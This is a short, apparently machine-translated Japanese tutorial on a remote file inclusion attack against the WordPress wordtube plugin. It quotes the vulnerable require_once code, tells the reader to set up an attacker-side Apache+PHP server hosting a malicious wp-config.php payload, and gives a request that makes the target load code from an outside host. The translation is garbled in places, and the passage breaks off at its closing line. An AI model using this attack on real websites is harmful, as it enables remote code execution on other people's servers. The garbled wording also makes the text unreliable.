hugging bugging中に、display_errors = onでdisplay_errors =をオンにすることができます。2。ターゲットマシンの使用には、ターゲットマシンの構成が含まれます。
c )allow_url_include = On
このようなターゲットは攻撃される可能性があります
簡単なサーバーを自分で構築し、Apache + php で十分です
httpd.conf を修正し、攻撃側でコードが実行されるのを避けるためにサフィックスを php に変更します,
#AddType application/x-httpd-php .php .html .htm
脆弱性コードに基づいて対応する環境を生成します。例:
if (!$_POST) $wppath=$_GET['wpPATH' ];
else $wppath=$_POST['wpPATH'];
require_once($wppath.'/wp-config.php');
アクセス可能なフォルダーを作成できます。 、すべての許可を拒否します、
次に、その中に新しい wp-config.php を作成します
<?php mkdir('c:\exploit'); phpinfo(); exit;?>
~それからリクエストするだけです
/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH =http ://10.67.1.30/bad_guy
これがレンダリングです: